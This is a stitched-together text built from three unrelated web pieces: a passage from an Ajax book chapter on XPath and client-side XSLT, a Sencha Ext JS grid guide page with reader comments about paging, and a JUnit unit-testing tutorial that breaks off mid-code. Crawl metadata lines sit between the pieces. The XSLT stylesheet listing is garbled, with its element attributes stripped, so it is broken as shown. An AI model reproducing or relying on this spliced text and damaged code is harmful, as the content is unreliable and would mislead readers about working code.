a fraction of the general population. It is a pretty safe bet that you can ignore these web browsers entirely without alienating anyone but technophobes, the White House, and project leaders who use the term blink. Earlier I stated that XPath was the targeting device for XSLT, which is essentially true. XPath is used to describe the XML node or nodes that we're looking for. As the name suggests, XPath describes the path to the node that we're looking for. For example, let's say that we want the state_name node in the XML document shown in Listing 11-1. A number of different ways exist for locating it, some of which are shown in Listing 11-2. > /states/state/state_name /*/*/state_name /*/*/*[name(.) = 'state_name'] /states/state/*[2] //state_name Why so many? With XPath, it is possible to describe complete paths, paths with wildcards, and paths based upon its location, or to describe only the node itself. From a high level, such as an orbital view, it works as shown in Table 11-1. XPath Notation Description / Either the root node, in the case of the first slash, or a separator between nodes // Anywhere in the document that meets the criteria * Wildcard (I know that there is a node here, but I don't know its name) . The context node (where we are at this point) [2] A predicate stating that the second node is the one we want states Qualified node name state state_name name() A function that returns the name of passed node [name(.) = 'state_name'] A predicate stating that the desired node name is state_name Alright, that should be enough XPath to get started. Now let's take a gander at the XSLT shown in Listing 11-3, whose purpose is to build an HTML select object using the XML from Listing 11-1. <?xml version='1.0'?> <xsl:stylesheet version="1.0" xmlns: <xsl:output <xsl:template <select id="myselect" name="myselect"> <xsl:for-each <xsl:element <xsl:attribute <xsl:value-of </xsl:attribute> <xsl:value-of </xsl:element> </xsl:for-each> </xsl:template> </xsl:stylesheet> Pretty cool, isn't it? At first glance, not only is it nicely indented, but it also has the advantage of being one of the most obscure things that you've ever laid your eyes upon. A second glance reveals some details that you might have missed the first time; for example, the select statement looks remarkably like HTML. There is a very good reason for the resemblance: It is HTML. In fact, the xsl:output statement even says that it is HTML, and you can take it from me, xsl:output statements don't lie. Upon closer examination, some other details might pop out, such as the xsl:template with match="/". From what we covered earlier, the slash means that we're looking for the root node. And while we're examining XPath, you'll find xsl:for-each with select="/states/state". Just in case you're wondering, for-each means exactly what you think it does: Iterate once for every node that matches the predicate. Another thing that might jump out is the xsl:element node with name="option". This is an alternate method of specifying an output element. The xsl:attribute also does exactly what you'd expect from its name; it defines an attribute of the previous xsl:element. Finally, the xsl:value-of simply copies the node's content from the source document to the output document. In a nutshell, that's pretty much the basics of XSLT and XPath. The next question, of course, is, "So, what does the output HTML look like?" For the answer, check out Listing 11-4. <select id="myselect" name="myselect"> <option value="AB">Alberta</option> <option value="AK">Alaska</option> <option value="AL">Alabama</option> <option value="AR">Arkansas</option> Later, both in this chapter and in others, you'll find more detailed examples of client-side XSLT. Back when I was first learning XSLT, I was developing with the bare minimum, a text editor and a copy of Microsoft Internet Explorer version 5.01and I was happy! Well, at least for about 20 minutes or so, right up to the point I read the World Wide Web Consortium's XSLT recommendation. But we've already covered that, and after I downloaded a copy of Internet Explorer version 6, I was happy againat least, until I found Mozilla and then Firefox. My first impression was that there was something wrong with the Gecko XSLT processor, but there was a gnawing doubt. The reason for this was that I'd never personally found an error in a Gecko-based browser, and I had found several in Internet Explorer. So with a critical eye and a hard copy of the recommendation, I began to examine the "bugs" that I had found in the Gecko XSLT processor. The results came as no surprise to me. Gecko strictly followed the published recommendation, whereas IE seemed somewhat looser around the edges. My problem was that I had developed some bad habits developing in a microcosm and had a tendency to tailor my code to that microcosm. Because of this, I now try out my style sheets in at least two different XSLT processors before I consider them even partially tested. Let's take a look at how to create an instance of the XSLT processor in Microsoft Internet Explorer and every other web browser on the planeter, I mean Firefox, yeah, Firefox. Listing 11-5 shows a little cross-browser web page that uses one XML Data Island, the first containing the XML while the XSLT is loaded from the server via the XMLHttpRequest object. This is nothing flashy, merely a "proof of concept." It just creates an HTML select object and plops it on a page. <html> <head> <title>XML Data Island Test</title> <style type="text/css"> xml { display: none; font-size: 0px } </style> <script language="JavaScript"> var _IE = (new RegExp('internet explorer','gi')).test(navigator.appName); var _XMLHTTP; // XMLHttpRequest object var _objXML; // XML DOM document var _objXSL; // Stylesheet var _objXSLTProcessor; // XSL Processor var _xslt = 'stateSelect.xsl'; // Path to style sheet /* Function: initialize Programmer: Edmond Woychowsky Purpose: Perform page initialization. */ function initialize() { if(_IE) { _XMLHTTP = new ActiveXObject('Microsoft.XMLHTTP'); _objXML = new ActiveXObject('MSXML2.FreeThreadedDOMDocument.3.0'); _objXSL = new ActiveXObject('MSXML2.FreeThreadedDOMDocument.3.0'); _objXML.async = false; _objXSL.async = false; _objXML.load(document.getElementById('xmlDI').XMLDocument); } else { var _objParser = new DOMParser(); _XMLHTTP = new XMLHttpRequest(); _objXSLTProcessor = new XSLTProcessor(); _objXML = _objParser.parseFromString(document.getElementById('xmlDI').innerHTML, "text/xml"); } _XMLHTTP.onreadystatechange = stateChangeHandler; _XMLHTTP.open('GET',_xslt,true); _XMLHTTP.send(null); } /* Function: stateChangeHandler Programmer: Edmond Woychowsky Purpose: Handle the asynchronous response to an XMLHttpRequest, transform the XML Data Island and display the resulting XHTML. */ function stateChangeHandler() { var strXHTML; if(_XMLHTTP.readyState == 4) { if(_IE) { var _objXSLTemplate = new ActiveXObject('MSXML2.XSLTemplate.3.0'); _objXSL.loadXML(_XMLHTTP.responseText); _objXSLTemplate.stylesheet = _objXSL; _objXSLTProcessor = _objXSLTemplate.createProcessor; _objXSLTProcessor.input = _objXML; _objXSLTProcessor.transform(); strXHTML = _objXSLTProcessor.output; } else { var _objSerializer = new XMLSerializer(); _objXSL = _XMLHTTP.responseXML; _objXSLTProcessor.importStylesheet(_objXSL); strXHTML = _objSerializer.serializeToString(_objXSLTProcessor.transformToFragment (_objXML, document)); } document.getElementById('target').innerHTML = strXHTML; } } </script> </head> <body onload="initialize()"> <xml id="xmlDI"> > </xml> <b>XML client-side transformation test</b> <div id="target"></div> </body> </html> Alright, now that the proof of concept has been successfully completed, all that remains is to see how it can be applied to our e-commerce website. Now that we have some of the basics down, let's take a look at how XSLT can be used to provide additional functionality to our e-commerce website. I should point out, however, that when I originally proposed this idea to a client, I was called insane. The comments were that it would be unworkable and that nobody in their right mind would have even suggested it. In my defense, this was the client that used terms such as blink and was "looking into" converting all web applications into COBOL so that developers other than the consultants could understand it. That's enough introductions; without further ado, allow me to describe what I consider the ultimate "mad scientist" website. Excluding pop-ups, the site would be a single web page, with all communication between the server and the client taking place using the XMLHttpRequest object. Instead of subjecting the visitor to an endless cycle of unloads and reloads, the page would simply request whatever it needed directly. In addition, when a particular XSLT was obtained from the server, the client would cache it, meaning that the next time it was needed, it would already be there. It was within the realm of possibility that eventually the client would have all the XSLT cached on the web browser. The more the visitor did, the better the shopping experience would become. Needless to say, the website was never created, alas, and my contract was terminated because they felt that resources could be better used supporting their mainframe applications. Personally, I think that they lacked foresight, and if they had pursued the concept to its logical conclusion, they'd now be mentioned in the same breath as Google. Instead, they decided to regress into the future of the 1960s as opposed to the future of the twenty-first century. But I'm hardly an objective observer.
http://www.yaldex.com/ajax_tutorial_2/ch11lev1sec1.html
CC-MAIN-2017-17
refinedweb
2,225
53.92
Writing a git-annex plugin for ranger I use git-annex to distribute and synchronize fairly large and mostly static files across different machines. However, being based on Git makes it pretty uncomfortable to use from the command line. So, why not integrating it into our favorite command line file manager, ranger? Because I struggled a bit with ranger’s internals, I will outline how I wrote the plugin. Initialization First of all, we need a place for our plugin. By default ranger imports every Python module from $XDG_CONFIG_HOME/ranger/plugins in lexicographic order. If $XDG_CONFIG_HOME is not set, ~/.config is used as the default alternative. To use the plugin from within ranger, you need to provide code that hooks into one of the two methods provided by the ranger API. hook_init is called before the UI is ready, which means you can dump output on stdout, whereas the UI can be used in hook_ready. The suggested way is not to replace the original function but chaining up like this: import ranger.api old_hook_init = ranger.api.hook_init def hook_init(fm): # setup return old_hook_init(fm) ranger.api.hook_init = hook_init Adding new commands In the introductory post, I briefly explained how to write custom commands which you add to your commands.py file: You simply subclass from ranger.api.commands.Command and write code in the execute method. However, commands defined in a plugin are not automatically added to the global command list. For this you need to extend the commands dictionary of the file manager instance, i.e. def hook_init(fm): fm.commands.commands['annex_copy'] = copy When using the annex_copy command, tab-completion should cycle through all available remotes. This is done by returning an iterable in the tab method. In the execute method you can access arguments, by calls to the arg method: class copy(ranger.api.commands.Command): def tab(self): return ('annex_copy {}'.format(r) for r in remotes) def execute(self): remote = self.arg(1) Asynchronous calls The git-annex plugin works on the current or currently selected list of files, which you can get via fm.env.get_selection(). To avoid blocking the UI while fetching large files, I use the CommandLoader to run the git annex commands in the background (thanks @hut). The loader emits a signal when the action is finished to which we subscribe in order to refresh the directory content: class copy(ranger.api.commands.Command): def execute(self): remote = self.arg(1) def reload_dir(): self.fm.thisdir.unload() self.fm.thisdir.load_content() for path in (str(p) for p in self.fm.env.get_selection()): fname = os.path.basename(path) cmd = ['git', 'annex', 'copy', '-t', remote, fname] loader = CommandLoader(cmd, "annex_copy to remote") loader.signal_bind('after', reload_dir) fm.loader.add(loader) Long running actions can be cancelled by the user, so if you need to clean up you should add that extra code to the cancel method. Wrap up That’s it, a plugin that registers new commands for interacting with git-annex an asynchronous way. Bug reports and pull requests are welcome.
https://bloerg.net/posts/writing-a-git-annex-plugin-for-ranger/
CC-MAIN-2021-25
refinedweb
509
58.89
Step 3: Installing flaskr as a Package¶ Flask is now shipped with built-in support for Click. Click provides Flask with enhanced and extensible command line utilities. Later in this tutorial you will see exactly how to extend the flask command line interface (CLI). A useful pattern to manage a Flask application is to install your app following the Python Packaging Guide. Presently this involves creating two new files; setup.py and MANIFEST.in in the projects root directory. You also need to add an __init__.py file to make the flaskr/flaskr directory a package. After these changes, your code structure should be: /flaskr /flaskr __init__.py /static /templates flaskr.py schema.sql setup.py MANIFEST.in Create the setup.py file for flaskr with the following content: from setuptools import setup setup( name='flaskr', packages=['flaskr'], include_package_data=True, install_requires=[ 'flask', ], ) When using setuptools, it is also necessary to specify any special files that should be included in your package (in the MANIFEST.in). In this case, the static and templates directories need to be included, as well as the schema. Create the MANIFEST.in and add the following lines: graft flaskr/templates graft flaskr/static include flaskr/schema.sql Next, to simplify locating the application, create the file, flaskr/__init__.py containing only the following import statement: from .flaskr import app This import statement brings the application instance into the top-level of the application package. When it is time to run the application, the Flask development server needs the location of the app instance. This import statement simplifies the location process. Without the above import statement, the export statement a few steps below would need to be export FLASK_APP=flaskr.flaskr. At this point you should be able to install the application. As usual, it is recommended to install your Flask application within a virtualenv. With that said, from the flaskr/ directory, go ahead and install the application with: pip install --editable . The above installation command assumes that it is run within the projects root directory, flaskr/. The editable flag allows editing source code without having to reinstall the Flask app each time you make changes. The flaskr app is now installed in your virtualenv (see output of pip freeze). With that out of the way, you should be able to start up the application. Do this on Mac or Linux with the following commands in flaskr/: export FLASK_APP=flaskr export FLASK_DEBUG=true in a browser. When you head over to the server in your browser, you will get a 404 error because we don’t have any views yet. That will be addressed a little later, but first, you should get the database working. Externally Visible Server Want your server to be publicly available? Check out the externally visible server section for more information. Continue with Step 4: Database Connections.
http://flask.readthedocs.io/en/latest/tutorial/packaging/
CC-MAIN-2017-39
refinedweb
474
58.58
Up till now, in this tutorial series, we were working in C# windows. In our last post we talked of Collection of Objects. From this tutorial on, we will spend more and more time in XAML window rather than C# window. Till now we have just seen XAML windows but haven’t actually interacted with apart from dragging and dropping controls to visual editor. Now we will start using XAML editor more aggressively as we build our application. As we have seen earlier, when we open any project in Silverlight; there are two panes facing us. One pane is visual editor and another one having XAML coding on it. Let’s get started then by understanding its working. XAML is a programming language just like C# is another programming language. XAML is mainly used for designing the user interface. When we drag any control on visual editor, you might’ve observed that when we do so, some code is added to the XAML window automatically. Similarly, when we make changes in any properties of controls that too changes the XAML code. This is done automatically by Visual Studio for our convenience and thus we get a very easy and simple to use “Drag-and-drop” interface. Now look at the top of the XAML windows, you will see few lines starting with “xmlns”, what are these lines? These lines are namespaces. I hope you remember what namespaces are! These lines denote namespaces and assembly where those files are stored. There are several layout controls, which help users to lay their controls as per their wish on-screen. Some of them are stack panel, grid and so on. Let us create a button using XAML code. Create a new project with some meaningful name. Search for following code: <Grid x: </Grid> And in between those grid tags paste following code: <Button Name="myButton" Height="100" Width="150" Content="Click me" HorizontalAlignment="Center" VerticalAlignment="Center"/> Once you paste this code, notice that a new button will be created on the designer surface. Congratulations, you have just created a button using nothing more than pure coding. There is a lot to learn in XAML window, but keep studying it until we are back with next tutorial. In next, tutorial, we will learn about all the Silverlight layout controls.
http://www.thewindowsclub.com/understanding-xaml-windows-phone-turorial-part-15
CC-MAIN-2013-48
refinedweb
385
64.81
Talend Data Mapper provides you with the possibility to export your Structures as CSV files, Java classes or Avro files, to enable you to work with the exported files in external tools. The procedure for all three types of output file is more or less the same. Any particularlities based on the type of structure are specified below. To export Structures as CSV files, Java classes or Avro files, do the following: Click File > Export in the Export window that opens, expand Data Mapper and select CSV Export, Java Export or Avro Export as appropriate, then click Next. In the window that opens, expand your project in the left-hand pane and select the Structures checkbox, then select the checkboxes in the right-hand window that correspond to the Structures you want to export. In the To directory field, select the directory to which you want to export by clicking Browse, browsing to the target directory or clicking Make New Folder if the directory does not already exist, and then clicking OK. [For Java classes] In the Java package name field, enter a name for the package you are going to create. [For Avro files] In the Avro namespace field, enter a name for the Avro namespace. Click Finish to complete the process.
https://help.talend.com/reader/YTUJp4~lScETGDBqSSOt5g/XQ89dX5mUG9oJaF5qE0Uew
CC-MAIN-2020-34
refinedweb
213
56.18
Up until a few years ago, most people didn’t put much thought into „CSS architecture“ (I’m quite sure it wasn’t even a thing). Around the year 2009 some sophisticated fronted folks (most notably Nicole Sullivan) started talking about concepts like OOCSS. /* Typical CSS code, ca. 2010 */ .selector ul > li #imAnID { background-color: hotpink !important; } I tinkered around with OOCSS and really liked it, so I started to build some reusable components and used them for my personal projects. Life was nice and easy. In the year 2011 Bootstrap was released and quickly gained traction. Although I liked many parts of Bootstrap, there were some aspects I didn’t agree with. So as almost every self respecting programmer does at some point in life, I made a momentous decision: I should make my own framework. avalanche was born (obligatory XKCD link). avalanche 2.x.x and 3.x.x avalanche 1.x.x was basically a collection of BEM style OOCSS components. It was not until version 2.x.x when it became interesting. I moved all components into separate GitHub repositories and made them work as Bower packages. I also split the packages into different types (mostly based on the ITCSS convention). The biggest change from version 2.x.x to 3.x.x was the switch to npm instead of Bower. With version 3.x.x I also tried to use SASS to it’s limits and made almost every aspect of the packages configurable. // 3.x.x example code (grid object package). .#{$o-grid-namespace} { @include o-grid($o-grid-flex, $o-grid-flex-fallback); @if $o-grid-spaced-vertical-default-size { @include o-grid-spaced-vertical(map-get($spacing, $o-grid-spaced-vertical-default-size), '.#{$o-grid-namespace}__item'); } @if $o-grid-spaced-horizontal-default-size { @include o-grid-spaced-horizontal(map-get($spacing, $o-grid-spaced-horizontal-default-size), '.#{$o-grid-namespace}__item'); } } .#{$o-grid-namespace}__item { @include o-grid-item($o-grid-flex, $o-grid-flex-fallback); } This was powerful and flexible but also very hard to explain to other developers. One other major pain point still existed in version 3.x.x – packages depended on the avalanche core and were not usable without it. 4.x.x I already knew that a package based workflow is superior to a monolithic approach but one thing I learned from my experiences building and using avalanche was: it is very hard to build reusable packages. One of the biggest problems with package based CSS workflows I encountered is, that CSS and even SASS or LESS, do not provide all the tools necessary to efficiently integrate packages into your project. // JavaScript modules are awesome. import { Stuff, OtherStuff } from 'SomeModule'; We need more tooling In the JavaScript world this problem is solved since a few years. The require() syntax and more recently the standard ES6 import syntax, do solve this problem very elegantly. But those are solutions which are only possible thanks to tooling. Not even the latest modern browsers do support import. Ironically CSS supports @import natively since at least 15 years. But until the invention of preprocessors like SASS and LESS it was almost useless. And even with preprocessors, the @import rule is still lacking functionality. - Multiple imports of the same file Preprocessors do import a file multiple times when they encounter the same @importrule multiple times in the code, which leads to code duplication. - Importing only specific selectors In the front-end world every byte matters and therefore it is quite costly to @importa complete package if you just need one class from it. - Selectors should match the projects naming convention If you use a third party CSS package, you do not want to end up with a mixture of different naming conventions for CSS selectors. For my idea of how avalanche 4.x.x should work, I needed a solution for those three problems. Thats why I built node-sass-magic-importer, a custom node-sass importer. Standalone packages What really bothered me with version 3.x.x was that all the packages still depended on the core avalanche package. With version 4.x.x packages are built in a way so that they can work standalone. Packages are now way less configurable but thanks to the node-sass-magic-importer most of the configuration options aren’t necessary anymore. Instead of controlling the output of packages with variables, the user can import only the selectors he or she needs from the package. // Importing only specific selectors from an avalanche 4.x.x package. @import '{ .u-width-12/12, .u-width-4/12@m } from ~@avalanche/utility-width'; // Replace selectors to match the projects naming convention. @import '{ .u-width-6/12 as .half-width } from ~@avalanche/utility-width'; Monorepo Splitting packages in separate git repositories was a nice idea but it led to a lot of code duplication and overall more maintenance work. Some big open source projects recently made the switch to a monorepo structure (e.g. Babel). At first it really seems counter intuitive to make a monorepo for building a package based CSS framework. Using packages is easier when they are tiny and easy to understand without having to know anything about the code but building them is much more painless if you can see the big picture. Thinking about it that way, supports the case for a monorepo approach. Testing Being an open source maintainer really made me fall in love with automated testing. Without tests you can’t be sure if a bugfix or a new feature didn’t break something in your project. You live in constant fear that, after a new release, bug report notifications flood your inbox. Although automated tests are not a huge thing in the CSS world, I really wanted to have a system in place to prevent me from releasing faulty code. Every avalanche 4.x.x package comes with it’s own regression tests and a new release is only created if all the packages pass their tests. BackstopJS is used to run the tests. Conclusion For now I’m quite happy with the latest release of avalanche. I made the packages work standalone, optimized the development process by using a monorepo approach and made development less fragile by adding regression tests. I do not expect for avalanche to be the next Bootstrap or even to be used by many people. Although what I hope for is, that other people keep working on better ways of building design systems with CSS and that avalanche may serve as an inspiration for some of those people.
https://markus.oberlehner.net/blog/building-avalanche-v4/
CC-MAIN-2019-22
refinedweb
1,104
65.32
.NET Source Code Integration With the recent open sourcing of parts of .NET, we want to bring the best pieces of .NET to Mono, and contribute the cross platform components of Mono to the .NET efforts. This document describes the strategies that we will employ. We are tracking the most recent development at GitHub task. Background Microsoft is open sourcing .NET in two ways: .NET Core: a re-imagined version of .NET that is suitable to be deployed alongside web apps and places a strong focus on a new set of assemblies and APIs based on the PCL 2.0 profile. This is a full open source project, with Microsoft taking contributions and developing in the open. Parts of the .NET Framework: these are parts of the .NET framework as it ships on Windows, and the API that Mono has been implementing over the years. The version published here is a snapshot of the .NET Framework source code. While Microsoft is publishing the source code, they are not actively developing this tree in the open, nor are they taking patches. Considerations This section lists a set of issues to keep in mind while bringing the Microsoft .NET source code into Mono, and what we need to keep in mind as we upgrade the code. The list of issues below identifies the constraints that we have to bring .NET code into Mono. Mono’s Platform Specific Code In numerous instances, Mono contains platform specific code which is currently missing from .NET. There are a wide variety of features like this. Some examples include: the System.Environmentclass which provides a platform-specific set of locations for applications to lookup certain well known file system locations. The Registryclass which provides an abstraction that maps to Windows APIs or a file backed implementation on Unix. Mono’s Classes with Tight Runtime Integration Some of the APIs in the .NET framework are bound to have tight dependencies on their runtime implementation. Just like Mono’s implementation does. There are cases where we might want to take on the extra challenge of doing the runtime integration work (for example, switching from our barely maintained decimal support, to Microsoft’s version would be a win). In other cases, the amount of work is not worth doing the changes, like the support for System.Reflection.Emit. Mono Profiles Mono ships a mobile API profile which is designed to be a lightweight API profile and is used in mobile devices, game consoles and the Mono for Unreal Engine project. The Mobile Profile basically removes some of the heavier .NET dependencies from the system. It mostly deals with removing System.Configuration dependencies from our class libraries. Mono Core In the long term, we want to adopt a .NET-Core like approach, where we have a thin layer of platform/VM specific APIs, and we allow users to use Mono in the same way that .NET core can be used, without the large libraries/profiles. Mono Classes are Linker Friendly Some of the class libraries in Mono have been designed to keep the result linker-friendly, an important piece of functionality required by our Android and iOS deployments. This comes in the form of removing some runtime weak association with a strong association, or teaching our linker and class libraries of connections between certain classes and their requirements. Many of those links would likely exist in .NET as well, but we would need to ensure that we do not regress when incorporating code here. Base Class Libraries Bootstrapping The bootstrapping of the core libraries is not exactly fun. Microsoft has cyclic dependencies on various assembly groups. For example mscorlib, System, System.Xml, System.Configuration and System.Core are build referencing each other’s types. Another cluster includes the System.Web family. Mono currently has a multi-stage build process to create these libraries that have cyclic dependencies. Bringing new code from Microsoft is possible, but for each class that we bring, we might need to adjust the cyclic dependency build. Missing Resources The distribution does not include the resouces for some of the code. These manifest themselves as references to a class called “SR”. We are going to need to autogenerate those. Limited Man Power We have limited manpower, so when bringing code from .NET, we need to pick our battles. The pieces of Mono that have been used the most are of higher quality than the pieces that have not been used very much, or have not been maintained for a long time. It is best to focus our efforts on the high-value targets in the .NET class libraries than to bring things that are known to work well in Mono and are well tested. Some .NET Code might not be complete Some of the .NET code that we are getting might not be complete, it might be missing resources, strings, build files and might not be trivially buildable. So it is important that when you submit a pull request, the patch builds completely. Performance/Memory side effects This is mostly a non-issue, but we might find cases where Mono class libraries have been fine-tuned for use in the Mono runtime and bringing the equivalent code from Microsoft might regress our performance or make us allocate more memory. Some items to watch out for: Code Access Security checks: these are likely present in .NET, and they do not exist in Mono. They are relatively expensive to perform, and Mono does not even implement it correctly. So we would need to ifdef out all the CAS-related support when importing the code. Object Disposed: Mono did not always faithfully implement the object disposed pattern. This is a pattern where objects that implement IDisposablethrow the ObjectDisposedExceptionwhenever an object’s Dispose method was called, but a member of that instance was called. This requires extra testing that Mono currently does not have in a few places. It might not matter, but we might want to watch out for this. Enumeration Validation: .NET tends to validate the values of enumeration passed to its functions. Mono does not do this, so we might have a performance impact when we bring some of the code. Code Access Security Checks is probably the one that we should be worried about, as it is completely useless in Mono. Compile-Time Defines The Microsoft source code contains many different kinds of compiler defines that are used for conditional compilation. Whenever we are importing code from Microsoft, we need to perfom an audit and determine which features we want to take. Strategy In general, we will be integrating code from the Reference Source release, as this contains the API that is closest to Mono. We are tracking the task assignements on Trello. Later on, when we implement Mono Core, we will instead contribute the VM/OS specific bits to .NET Core. We need to come up with an integration plan that will maximize the benefits to Mono and our users with the least amount of engineering effort. While in an ideal world we could bring some 80-90% of the code over, this is a major effort with many risks involved. We will prioritize the work to focus on what would give us the most benefits upfront for the Mono community, and leave the more complex/harder difficult bits for later. Giving Mono a big boost from the start When bringing code to Mono, we can bring code in the following ways: - Entire assemblies - Entire classes - Blended Work - Individual members Entire Assemblies We should port entire assemblies when our assembly is known to be very buggy, in bad shape, or just completely broken. Immediate candidates for this include: - WCF - almost immediately - System.Web - almost immediately Medium term candidates include: - System.Configuration - possible, but requires careful examination - System.Linq.Data - Remoting Long term candidates include: - XML stack Entire Classes We would port entire classes when a class or a family of classes is known in Mono to be buggy, poorly maintained or a source of problems. Candidates for this include: - System.Text.RegularExpressions Blended Work These are libraries of high quality code and whose Mono counterpart might be known to have limitations, bugs or problems. But yet, the Microsoft implementation contains dependencies on native libraries that do not exist across all platforms. - HTTP client stack … this was done by Pull Request #4893 and similar PRs. System.Data.*- Microsoft’s impementation has many dependencies on native code that need to be refactored to be cross platform. Individual Members We will find some of this code in a few places. There are places in Mono that while pretty good overall, might have some known bugs and limitations. The binding functionality in System.Reflection is an example of a method that works, but might have bugs and mistakes on the edges. Porting and Regressions Whenever we bring .NET code to replace Mono code, there might be cases where we introduce a regression of some kind: functionality, performance or we bring in a behavior that is incompatible with the idioms that Mono users have used for a long time. In general, when porting code to Mono, we should make sure that Mono’s test suite continues to pass, and that no regressions are introduced. If a regression is introduced, we need to file a bug and track this particular problem. Very popular, mostly bug-free APIs: skip Mono’s core is in very good shape, and there will be very little value in bringing the .NET implementation to Mono. It would consume valuable engineering time to replace good code with another piece of good code, while also paying the price of potential regressions. Empowering Third Parties There are certain pieces of code that are going to be difficult to do, but if we do them, we can assist third parties that do not know as much about Mono’s internals or our build process to contribute. Dealing with System.Configuration In general, the idiom that we will use when porting code that involves System.Configuration that we want to support both in the full profile mode and the Mobile Profile mode will be roughly: - Comment out the public class that subclasses ConfigurationSection. - Keep the SettingsSectionInternalclass around, since so much code depends on it. - ifdef-out the constructor that depends on System.Configurationfrom this class that uses System.Configuration, and replace it instead with hardcoded values that we obtain from running the code in .NET and obtaining the default values. - Add the partialclass modifier to the SettingsSectionInternalclass. - Provide a constructor in the partial class in Mono to setup the default values. - Track each setting, so that we can later decide if we want to provide a C# API to change these values. Source Code Style When making changes, try to keep the style of the original project. If you are making changes to .NET’s code, use their style. When making changes to Mono, use our style. We believe that we can mostly make few changes to the upstream code and mostly use either #if blocks, partial classes and split a few things to achieve portability. .NET Core and Mono We want to contribute some of the cross platform code from Mono, as well as chunks that we port from the .NET Framework Reference Source to the .NET Core effort. We will update this page with information as the porting process at Microsoft evolves and we can volunteer some of our/their code back to the .NET Core effort.
https://www.mono-project.com/docs/about-mono/dotnet-integration/
CC-MAIN-2020-50
refinedweb
1,916
64.71
Tweet Published Apr 26, 2011 | The Sencha Dev Team | Guide | Medium Last Updated Jul 11, 2011 This Guide is most relevant to Ext JS, 4.x. Guide guides/grid/README.js is not currently available Share this post: Leave a reply 6 Comments Olivier Pons3 years ago That’s a very nice tutorial, but is there any way to handle key (up / press / down) events? If the user press the “del” key => suppress current record; If the user press the “enter” key => edit current record; If the user press the “insert” key => create new record. How would you do this? DK3 years ago I used this code as an example ... my jsp includes ext-debug.js ... I keep getting “Uncaught TypeError: Cannot call method ‘substring’ of undefined” on line 5981 —>(if (namespace === from || namespace.substring(0, from.length) === from) {) What is it complaining about ? Bo3 years ago tooltip for grid - trying to utilize MVC to create tooltip (e.g.); care to show example of how that might look? slemmon3 years ago @Olivier - Check out this page: It’s for older Ext versions, but has a KeyMap section that I think might help you out. Craig P3 years ago I tried to work this in to the existing MVC tutorial. As for the paging, either docked on in-line scrolling: it didn’t work. Surprise surprise. Tirumalasetti3 years ago I’m new to Ext Js. Starting working on Ext Js 4 since couple of days. Pagination doesn’t work the below mentioned code. I mean store does not reflect with pageSize=n (Eg; 1,2,3,...etc). Ext.create(‘Ext.data.Store’, { model: ‘User’, autoLoad: true, pageSize: 4, proxy: { type: ‘ajax’, url : ‘data/users.json’, reader: { type: ‘json’, root: ‘users’, totalProperty: ‘total’ } } }); Ext.create(‘Ext.grid.Panel’, { store: ‘User’, columns: ..., dockedItems: [{ xtype: ‘pagingtoolbar’, store: userStore, // same store GridPanel is using dock: ‘bottom’, displayInfo: true }] }); Wasted couple of days to come to this conclusion. After googling i got the partly pagination solution with PaginationMemoryProxy.js. Again if i want to use Ajax proxy this doesn’t work out. Please fix this issue so that other folks should not be effected. Leave a comment:Commenting is not available in this channel entry.
http://www.sencha.com/learn/the-grid-component/?_escaped_fragment_=/guide/grid-section-paging
CC-MAIN-2014-15
refinedweb
369
74.79
While software testing is generally performed by the professional software tester, unit testing is often performed by the software developers working on the project, at that point of time. Unit testing ensures that the specific function is working perfectly. It also reduces software development risks, cost and time. Unit testing is performed by the software developer during the construction phase of the software development life cycle. The major benefit of unit testing is that it reduces the construction errors during software development, thus improving the quality of the product. Unit testing is about testing classes and methods. What is JUnit? JUnit is a testing tool for the Java programming language. It is very helpful when you want to test each unit of the project during the software development process. How to perform unit testing using the JUnit testing tool To perform JUnit testing in Java, first of all, you have to install the Eclipse editor. Installation of the latest version is recommended. You can download the Eclipse IDE from the following link:. In the Eclipse editor, you can write any code. For example, lets suppose that I want to test the following code: Code-1 1 package com; 2 3 public class Junit { 4 5 public String concatenate(String firstName, String lastName) { 6 7 return firstName + lastName; 8 } 9 10 public int multiply(int number1, int number2) { 11 12 return number1 * number2; 13 } 14 15 } After writing Code-1, lets write two test casesone for the concatenate method and the other for the multiply method of the JUnit class defined in this code. To create JUnit test cases, you need to click on the Eclipse editor: File->New->JUnit Test Case Defining the test case for the concatenate() method of the JUnit class (Code-1) Code-2 1 package com; 2 import static org.junit.Assert.*; 3 import org.junit.Test; 4 5 public class ConcatTest { 6 7 @Test 8 public void testConcatnate() { 9 10 Junit test = new Junit(); 11 12 String result = test.concatenate(Vikas,Kumar); 13 14 assertEquals(VikasKumar, result); 15 16 } 17 18} Code-2 is the test case for the concatenate() method defined inside the JUnit class in Code-1. The annotation @Test at Line 7 is supported by JUnit version 4. To add JUnit version 4, you can click on Project directory in the Eclipse IDE and go to Java Build Path, before clicking on Add Library and then on JUnit, where you select Junit 4. The assertEquals() method is a predefined method, and it takes two parameters. The first parameter is called expected output and the second is original output. If the expected output doesnt match the original output, then the test case fails. To run the test cases, right click the Eclipse code and then click on Run as JUnit Test. Defining the test case for the multiply() method of JUnit class (Code-1) Code-3 1 package com; 2 3 import static org.junit.Assert.*; 4 import org.junit.Test; 5 6 public class MultiplyTest { 7 8 @Test 9 public void testMultiply() { 10 11 Junit test = new Junit(); 12 13 int result = test.multiply(5, 5); 14 15 assertEquals(25, result); 16 } 17 18 } Code-3 is the test case for the multiply() method of the JUnit class defined above. Creating a test suite A test suite is a combination of multiple test cases. To create a JUnit test suite, you need to click on the following in Eclipse: File->Other->Java->JUnit->JUnit Test Suite After creating the JUnit test suite, the code will look like what is shown in the Code-4 snippet. Code-4 1 package com; 2 3 import org.junit.runner.RunWith; 4 import org.junit.runners.Suite; 5 import org.junit.runners.Suite.SuiteClasses; 6 7 @RunWith(Suite.class) 8 @SuiteClasses({ ConcatTest.class, MultiplyTest.class }) 9 public class AllTests { 10 11 } Understanding the @Before annotation The @Before annotation is used to annotate the method that has to be executed before the actual test method gets executed. To understand this, lets look at Code-5. Code-5 1 package com; 2 3 public class Calculator { 4 5 public int add(int x, int y) { 6 7 return x + y; 8 } 9 10 public int sub(int x, int y) { 11 12 return x - y; 13 14 } 15 } Now lets create the test case for Code-5. The following code is the JUnit test case for the Calculator class defined in this code. Code-6 1 package com; 2 3 import static org.junit.Assert.*; 4 import org.junit.Before; 5 import org.junit.Test; 6 7 public class CaculatorTest { 8 9 Calculator cal; 10 11 @Before 12 /* 13 the init() method will be called for each test, such 14 testAdd() as well as testSub() 15 */ 16 public void init() { 17 18 cal = new Calculator(); 19 20 } 21 22 @Test 23 public void testAdd() { 24 25 int x = 10; 26 int y = 20; 27 assertEquals(30, cal.add(x, y)); 28 29 } 30 31 @Test 32 public void testSub() { 33 int x = 10; 34 int y = 20; 35 